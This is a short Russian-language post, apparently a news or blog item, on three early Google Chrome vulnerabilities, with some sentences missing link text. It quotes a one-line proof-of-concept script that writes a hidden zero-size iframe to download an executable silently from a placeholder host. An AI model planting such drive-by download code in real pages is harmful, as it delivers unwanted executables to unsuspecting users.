Первая, о которой я , позволяет удаленному пользователю аварийно завершить работу браузера.
Вторая уязвимость, , позволяет злоумышленнику выполнить произвольный файл на системе.
И третья, PoC код к которой был только что , позволяет злоумышленнику без уведомления пользователя загрузить произвольный исполняемый файл на систему в каталог, где сохраняются по умолчанию все загружаемые файлы.
PoC код:
<script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> |
Ну что же, как вы видите, ошибки весьма примитивны для современного поколения браузеров. Будем надеяться, что выход официальной версии Google Chrome не будет сопровождаться таким же количеством уведомлений в первые два дня релиза :)
